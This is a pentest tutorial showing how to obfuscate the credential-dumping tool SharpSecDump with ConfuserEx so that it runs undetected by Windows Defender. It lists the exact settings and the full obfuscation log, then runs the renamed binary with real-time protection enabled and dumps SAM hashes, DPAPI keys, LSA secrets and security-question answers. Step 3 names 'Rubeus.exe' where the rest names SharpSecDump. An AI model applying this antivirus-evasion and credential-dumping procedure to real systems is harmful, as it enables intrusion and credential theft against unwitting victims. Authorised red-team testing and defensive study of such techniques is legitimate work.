=====================================================================================================
AV bypass using the obfuscation tool 'ConfuserEx'
=====================================================================================================

ConfuserEx 2 is an open-source protector for .NET applications. 
It is the successor of the Confuser project and the ConfuserEx project.

ConfuserEx supports .NET Framework from 2.0 - 4.8, .NET Standard, .NET Core and Mono. 
It supports most of the protections you’ll find in commerical protectors, and some more!

Sources:
=> https://github.com/mkaring/ConfuserEx
=> https://mkaring.github.io/ConfuserEx/

Features
--------
- Supports .NET Framework 2.0/3.0/3.5/4.0/4.5/4.6/4.7/4.8
- Symbol renaming (Support WPF/BAML)
- Protection against debuggers/profilers
- Protection against memory dumping
- Protection against tampering (method encryption)
- Control flow obfuscation
- Constant/resources encryption
- Reference hiding proxies
- Disable decompilers
- Embedding dependency
- Compressing output
- Extensible plugin API
- Many more are coming!


===============================================================================================================================
PoC 1 - Example with the tool 'SharpSecDump.exe' running on a Windows 10 laptop without being detected by Windows Defender (AV) 
===============================================================================================================================

------------------------------------------------------------------------------------------------------
Step 1. Download, compile and run the tool 'ConfuserEx-GUI'
------------------------------------------------------------------------------------------------------

C:\Users\Administrator\Documents\Tools-Pentest\1-Antivirus-bypass\ConfuserEx-GUI>.\ConfuserEx.exe


------------------------------------------------------------------------------------------------------
Step 2. Go to the 'Project' section
------------------------------------------------------------------------------------------------------

> Drag and drop the C# assembly file 'SharpSecDump.exe' that you want to obfuscate.
   
> Fill-out the settings 'Base Directory' and 'Output Directory'.


------------------------------------------------------------------------------------------------------
Step 3. Go to the 'Settings' section
------------------------------------------------------------------------------------------------------

> Enable the 'Packer' tickbox and select 'Compressor'

> Select 'Rubeus.exe' in 'Modules' 

> Add rules by clicking on the '+' button and selecting obfuscation rules

   For example, I selected the 'Maxium' preset of obfuscation rules which include (not-exhaustive): 
   - Invalid metadata addition
   - Anti-tamper module writer preparation 
   - Anti-tamper helpers injection
   - Anti-tamper metadata preparation
   - Anti-debug injection
   - Anti-dump injection
   - Anti-ILDasm marking
   - Encoding reference proxies
   - Constant encryption helpers injection 
   - Resource encryption helpers injection
   - Control flow mangling
   - ...

------------------------------------------------------------------------------------------------------
Step 4. Go in the 'Protect!' section 
------------------------------------------------------------------------------------------------------

> Click on the button 'Protect!' to generate an obfuscated version of Rubeus executable

 [INFO] Confuser.Core 1.6.0+447341964f Copyright © 2014 Ki, 2018 - 2022 Martin Karing
 [INFO] Running on Microsoft Windows NT 6.2.9200.0, .NET Framework v4.0.30319.42000, 64 bits
[DEBUG] Discovering plugins...
 [INFO] Discovered 13 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading C:\Users\Administrator.PO718687\Documents\Tools-Pentest\13-SharpCollection\x64\SharpSecDump.exe...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing Type scanner phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing Name analysis phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module SharpSecDump.exe...
[DEBUG] Executing Invalid metadata addition phase...
[DEBUG] Executing Renaming phase...
[DEBUG] Renaming...
[DEBUG] Executing Anti-tamper module writer preparation phase...
[DEBUG] Executing Anti-debug injection phase...
[DEBUG] Executing Anti-dump injection phase...
[DEBUG] Executing Anti-ILDasm marking phase...
[DEBUG] Executing Encoding reference proxies phase...
[DEBUG] Executing Constant encryption helpers injection phase...
[DEBUG] Executing Resource encryption helpers injection phase...
[DEBUG] Executing Type scrambler phase...
[DEBUG] Executing Constants encoding phase...
[DEBUG] Executing Hardening Phase phase...
[DEBUG] Executing Anti-tamper helpers injection phase...
[DEBUG] Executing Control flow mangling phase...
[DEBUG] Executing Post-renaming phase...
[DEBUG] Executing Anti-tamper metadata preparation phase...
[DEBUG] Executing Apply watermark phase...
[DEBUG] Watermarking...
[DEBUG] Executing Packer info extraction phase...
 [INFO] Writing module koi...
[DEBUG] Encrypting resources...
 [INFO] Finalizing...
 [INFO] Packing...
[DEBUG] Encrypting modules...
 [INFO] Protecting packer stub...
[DEBUG] Discovering plugins...
 [INFO] Discovered 14 protections, 1 packers.
[DEBUG] Resolving component dependency...
 [INFO] Loading input modules...
 [INFO] Loading SharpSecDump.exe...
 [INFO] Initializing...
[DEBUG] Building pipeline...
[DEBUG] Executing Type scanner phase...
[DEBUG] Executing Module injection phase...
 [INFO] Resolving dependencies...
[DEBUG] Checking Strong Name...
[DEBUG] Creating global .cctors...
[DEBUG] Executing Name analysis phase...
[DEBUG] Building VTables & identifier list...
[DEBUG] Analyzing...
 [INFO] Processing module SharpSecDump.exe...
[DEBUG] Executing Packer info encoding phase...
[DEBUG] Executing Invalid metadata addition phase...
[DEBUG] Executing Renaming phase...
[DEBUG] Renaming...
[DEBUG] Executing Anti-tamper module writer preparation phase...
[DEBUG] Executing Anti-debug injection phase...
[DEBUG] Executing Anti-dump injection phase...
[DEBUG] Executing Anti-ILDasm marking phase...
[DEBUG] Executing Encoding reference proxies phase...
[DEBUG] Executing Constant encryption helpers injection phase...
[DEBUG] Executing Resource encryption helpers injection phase...
[DEBUG] Executing Type scrambler phase...
[DEBUG] Executing Constants encoding phase...
[DEBUG] Executing Hardening Phase phase...
[DEBUG] Executing Anti-tamper helpers injection phase...
[DEBUG] Executing Control flow mangling phase...
[DEBUG] Executing Post-renaming phase...
[DEBUG] Executing Anti-tamper metadata preparation phase...
[DEBUG] Executing Apply watermark phase...
[DEBUG] Watermarking...
[DEBUG] Executing Packer info extraction phase...
 [INFO] Writing module SharpSecDump.exe...
 [INFO] Finalizing...
[DEBUG] Saving to C:\Users\Administrator.PO718687\AppData\Local\Temp\jx41x2hp.wvk\d3kxkusg.nm4\SharpSecDump.exe...
[DEBUG] Executing Export symbol map phase...
 [INFO] Finish protecting packer stub.
[DEBUG] Saving to C:\Users\Administrator.PO718687\Documents\Tools-Pentest\13-SharpCollection\x64\Confused\SharpSecDump.exe...
[DEBUG] Executing Export symbol map phase...
 [INFO] Done.
Finished at 19:47, 0:00 elapsed.


--------------------------------------------------------------------------------------------------------------------------------------
Step 5. Execute the obfuscated version of 'SharpSecDump.exe' renamed as 'SuperRaoul.exe' without being detected by Windows Defender
--------------------------------------------------------------------------------------------------------------------------------------

PS C:\Users\Administrator\Desktop> systeminfo

Host Name:                 Laptop1
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free


PS C:\Users\Administrator\Desktop> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 09/02/2023 05:51:18


PS C:\Users\Administrator\Desktop> ./SuperRaoul.exe -target=127.0.0.1
[X] Error, unable to bind to service manager on 127
---------------Script execution completed---------------

PS C:\Users\Administrator\Desktop> exit


C:\Users\Administrator\Desktop> SuperRaoul.exe

-----------SharpSecDump Info-----------
Flag usage:  -Flag=setValue
--Required Flags--
-target :: comma seperated list of IPs / hostnames to run against.  Please dont include spaces between addresses
--Optional Flags--
-u :: Username to use, if not running in current users context. Must use with -P and -D flags
-p :: Plaintext password to use, if not running in current users context. Must use with -U and -D flags
-d :: Domain to use, if not running in current users context (. for local). Must use with -U and -P flags
-threads :: Threads to use to concurently enumerate multiple remote hosts (Default: 10)
--Example Format--
SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local


C:\Users\Administrator\Desktop> SuperRaoul.exe -target=127.0.0.1
[*] RemoteRegistry service started on 127.0.0.1
[*] Parsing SAM hive on 127.0.0.1
[*] Parsing SECURITY hive on 127.0.0.1
[*] Sucessfully cleaned up on 127.0.0.1
---------------Results from 127.0.0.1---------------

[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:36f7a3ebaa54<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c<SNIP>
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16<SNIP>
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3b0692<SNIP>
auditor:1022:aad3b435b51404eeaad3b435b51404ee:3bb631e20efee934f<SNIP>

[*] Cached domain logon information(domain/username:hash)
<SNIP>

[*] LSA Secrets
[*] $MACHINE.ACC
<SNIP>

[*] DPAPI_SYSTEM
dpapi_machinekey:0df3afb5656cb2bbee66eb0a887071<SNIP>
dpapi_userkey:720dd8e5b64f62c5619c6fc0075df6fc1<SNIP>

[*] L$ASP.NETAutoGenKeysV44.0.30319.0
[!] Secret type not supported yet - outputing raw secret as unicode:
??????????????????????????????????????????????????Ë????????????????????????????????????????????????????????????????????¯???????????????????????????????????????????????????????????????????????????????????????????????????????????>
U????????????????????????????????????????????????????????????

[*] L$_SQSA_S-1-5-21-936125016-2310263949-2175806047-1001
[!] Secret type not supported yet - outputing raw secret as unicode:
{'version':1,'questions':[{'question':'What was your first pets name?','answer':'audit'},{'question':'What is the name of the city where you were born?','answer':'audit'},{'question':'What was your childhood nickname?','answer':'audit'}]}

[*] NL$KM
NL$KM:087faeacc974ae07d0316fb4ad1507b87fbd4a1d77ef72dc378d4337f1f424358f<SNIP>
---------------Script execution completed---------------
